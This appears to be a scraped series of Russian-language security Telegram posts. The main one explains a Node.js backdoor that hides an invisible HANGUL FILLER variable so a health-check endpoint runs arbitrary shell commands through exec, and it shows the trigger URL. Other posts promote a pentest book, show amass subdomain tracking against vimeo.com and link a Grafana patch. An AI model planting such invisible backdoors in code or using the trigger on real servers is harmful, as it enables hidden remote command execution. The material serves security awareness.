Бесплатные инструменты для защиты Open Source

https://telegra.ph/Besplatnye-instrumenty-dlya-zashchity-Open-Source-11-19

#soft #безопасность #защита #инструменты #бесплатно

⁤Интересный и относительно новый способ бэкдоринга с использованием Unicode символов.

Присмотритесь к исходному коду - видите ли вы что-нибудь подозрительное? На скриншоте - скрипт простейшего хелсчека, который визуально выглядит безобидно, и выполняет функцию проверки работоспособности сети.

Но это только на первый взгляд. Начиная с ECMAScript 2015, все символы Unicode со свойством ID_Start могут быть использованы в коде в качестве имен переменных.

Символ под названием «HANGUL FILLER» (который, к слову, если указать в качестве ника в TG, становится некликабельным при пересылке) относится к категории «Letter, other» и является визуально невидимым, но при этом имеет свойство ID_Start и может быть использован в коде в качестве имен переменных.

Снова обратимся к коду, заменив HANGUL его escape-последовательностью:

const { timeout,\u3164 } = req.query;

Параметр timeout, который мы, используя деструктуризацию, извлекаем из req.query, не является единственным. Передав в запросе, в качестве параметра, HANGUL FILLER или любой, аналогичный ему символ (например, ZERO WITH SPACE), мы присвоим его в отдельную невидимую переменную, которую мы позже поместим в массив.

const checkCommands = [
'ping -c 1 google.com',
'curl -s http://example.com/',\u3164
];

Далее каждый элемент массива попадает в функцию exec, которая, в свою очередь, выполняет переданные ей команды в шелле. Остается только передать url-encode HANGUL в качестве параметра к нашему эндпоинту и в качестве значения - команду, которую мы выполним в системе
http://host:8080/network_health?%E3%85%A4=<command>

Огромный плюс данного подхода в том, что, кроме того, что он не виден на первый взгляд, он не виден также и при выделении текста. Даже IDE не подсвечивают и не раскрашивают такие Unicode символы, проиндексировав исходники.

📖 GPEN GIAC Certified Penetration Tester All-in-One Exam Guide.

• Дата выхода: 5 Ноября 2020 года.
• Рейтинг: ⭐️⭐️⭐️⭐️⭐️ (5 out of 5)
• Цена в онлайн магазине: 36$ или 2664₽.

• Подробное описание книги.

• VT.

Covers every topic on the exam, including:
• Pre-engagement and planning activities;
• Reconnaissance and open source intelligence gathering;
• Scanning, enumerating targets, and identifying vulnerabilities;
• Exploiting targets and privilege escalation;
• Password attacks;
• Post-exploitation activities, including data exfiltration and pivoting;
• PowerShell for penetration testing;
• Web application injection attacks;
• Tools of the trade: Metasploit, proxies, and more;

🧩 Софт для чтения.

#GPEN #Eng

​Отслеживание новых целей для атаки

Каждое сканирование, которое вы выполняете с помощью amass, автоматически сохраняется на компьютере, на котором вы его запустили. Затем, если вы снова запустите ту же проверку, amass будет отслеживать любые изменения, произошедшие с момента вашего последнего сканирования.

Наиболее очевидный способ использовать эту функцию-определить, какие поддомены появились с момента вашего последнего сканирования. Например, вы выполняли ранее сканирование:

amass enum -d vimeo.com

Сейчас прошло несколько месяцев и если снова выполнить это сканирование, а затем прописать

amass track -d vimeo.com

то мы сможем увидеть все, что изменилось за эти месяцы. Это позволяет нам сосредоточить внимание на свежих целях, которые с большей вероятностью будут уязвимы.

#web #tools #recon

https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/


Похоже надо обновлять графану везде где можно, пока не расползлось 🙂
https://twitter.com/h4x0r_dz/status/1468225847177977870

https://xvnpw.github.io/
xvnpw personal blog with posts about hacking, bug bounty, appsec

Staying sane in bug bounties
https://youtube.com/watch?v=us15nL2Hm2w&feature=share